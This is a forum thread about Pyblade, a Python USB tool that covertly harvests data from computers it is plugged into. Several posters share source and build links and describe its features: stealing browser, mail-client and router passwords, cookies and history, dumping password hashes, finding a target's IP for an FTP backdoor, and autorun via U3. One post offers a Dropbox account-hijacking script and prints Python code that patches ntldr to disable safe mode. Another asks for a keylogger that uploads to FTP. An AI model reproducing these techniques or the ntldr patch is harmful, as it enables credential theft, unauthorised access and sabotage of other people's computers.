Jump to content

Pyblade


sablefoxx

Recommended Posts

Guest seksi90210

I have not had a chance to check this post in a long while, been so busy. Sadly, I see no updates and assume sablefoxx is busy as well. I hope to see this project continued =]

Link to comment
Share on other sites

  • 1 month later...
  • Replies 93
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully).

(Go forth and learn python! http://docs.python.org)

http://dl.dropbox.com/u/341940/pyblade.tar.gz

Edited by sablefoxx
Link to comment
Share on other sites

  • 2 weeks later...
  • 1 month later...

@Emptiness:

idk how the pyload is configured (or built, I havent checked the .py files), but when I tried to run it from a random folder (on my D drive) it complained about the folder D:\logs\%pcname%%HOUR%-%MINUTES%\ that didn"t exist. I can only conclude that the pyload is made to be run only from the root of a drive (that's what sablefox said in his first post I believe). **if this aint right the rest of this part doesnt matter**

What the U3 shit does is placing it somewhere else and making it run fromthere. If the only reason u guys want it to be U3 is to make it autorunnable, well fine, here's a solution:

make a .BAT file that goes to the root of the drive and then runs the bex.exe (that is placed in the root of the drive) then make that bat into an .exe (bat to exe converter, google it) then convert the exe into an .u3p (PackageFactory, once again google it) then install the .u3p onto your u3 drive....

going to the root of the drive can be generally done in two ways:

cd..

cd..

cd..

cd..

.......................................(you got the point I guess)

cd..

or

%~d0

if you got firefox password stealer problems, just get the newest version from their site....

Link to comment
Share on other sites

  • 2 months later...

I don't know how alive this project still is, but I did some work on it so I guess I might as well post it... I used the old, stable source from the first post rather than the newest source that sablefoxx dumped. It should have all of the features in the OP, plus the features listed below.

Added features:

-The system info log now shows the target's public IP address, and gets it from 5 different sources for redundancy's sake. Should be useful for accessing that FTP backdoor

-Browser passwords can all be saved in one file, one file per browser, or both

-Dumps the saved cache for IE, Chrome, and Firefox

-Dumps the saved cookies of Chrome, Firefox, and Flash (couldn't get IE working)

-Dumps the saved history for Chrome and Firefox in addition to IE

-Dumps passwords saved in popular mail clients

-Dumps password to access the victim's router (unfortunately only works on a small set of routers)

-Modified U3 support: The drive now executes FBex without launching the U3 launchpad, making it stealthier

Known issues:

-PWDump is the only bit of the program that isn't working on on 64 bit systems

-IE Cookie Viewer doesn't save

I could not for the life of me figure out how to get PWDump working. I used sablefoxx's original code, it didn't work. I rewrote it, it didn't work. I don't know what to do. Here's an odd little note, tough: whenever I compiled bex.exe using py2exe on a 64-bit system, PWDump DID work on 64-bit systems, but the entire EXE wouldn't execute on any 32-bit system ("Not a valid Win32 application" error). Whenever I compiled the .exe on a 32-bit system, all of the .exe worked on 32-bit systems, and most of it worked on 64-bit systems, but not PWDump. For now, I just disabled PWDump in the configuration file by default (you can turn it on if you know the target is running 32-bit). It could have something to do with using an out-of-date version of PWDump, but I'm too frustrated with it by now to care... Apparently this wasn't an issue for others using sablefoxx's code, so maybe it's just me...

Here is the modified U3 launcher, using Universal Customizer (Windows XP only):

http://www.mediafire.com/?v82c88r8bc68i8y

Just extract the files, click the Universal Customizer application, and follow the instructions, the .iso should've already been made.

For those of you who can't run the above because you don't have XP, here is the .iso by itself:

http://www.mediafire.com/?m2rc6158y2dxryt

It needs to be burned to the virtual optical drive of your U3 device.

Here is the blade, just extract to the root of the flash drive:

http://www.mediafire.com/?2sogp1cy7lzt824

And finally, here's the source:

http://www.mediafire.com/?z6d4c116i75cn3p

Does anyone know any open source keyloggers that send the logs to an FTP server? I included a keylogger in my blade, but I couldn't upload that version because the one I used is commercial. If there was a good open source one, that'd be a cool thing to add.

*Fwew!* Well, that certainly was a fun exercise in learning Python. Thank you for uploading the source, sablefoxx ^_^

Link to comment
Share on other sites

  • 3 weeks later...

Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades!

http://ge.tt/8nETsM5?c

And if you're feeling a bit evil, disable safe mode (XP/2k3):

# Python 2.x Code
import os
import mmap

def patchNtldr(ntldr = 'C:\\ntldr'):
    file = open(ntldr, 'r+')
    size = os.path.getsize(ntldr)
    map = mmap.mmap(file.fileno(), size)
    map.seek(1915)          # Jump to offset
    map.write_byte('\x90')  # NOP Sled, whee!
    map.write_byte('\x90')
    map.write_byte('\x90')
    map.close()

if __name__ == '__main__':
    patchNtldr()

Edited by sablefoxx
Link to comment
Share on other sites

  • 4 weeks later...

Mubix posted the link...

http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/

Not bad as a PyBlade add-on !

:rolleyes:

I think that it would be impractical to add a memory dumping tool to a project like this. A memory dumper dumps the entire contents of the installed memory on the system. So lets say you added this onto Pyblade your usb would then dump the entire system memory so if the system had 8gbs of ram around 8 gbs of data would be dumped into your usb. For a tool like Pyblade which is intended to be inserted into a computer and remove quickly it would add a lot of time depending on the amount of Ram installed on the computer. Not saying that this tool is bad i just think that it was more intended for incident response teams. As they can use dumpit on there usb without any concern for time for how long the data will copy as long as they get their memory dump. Maybe dumpit can be added on to the incident response switchblade. Although this could very well change with usb 3.0 becoming mainstream as we could dump the memory a lot faster. But for now i would recommend dumpit for more incident response tool/usb kits.

That's my 2 cents anyway :lol:

Link to comment
Share on other sites

  • 5 months later...
  • 2 months later...

Hello,

This is a great piece of software. Kudos.

I have a question somewhat related to the software, but also towards windows 7.

If a user does not have admin access on a computer running windows 7 64 bit, will they be able to run this off of a USB drive?

Link to comment
Share on other sites

  • 2 weeks later...
  • 1 year later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...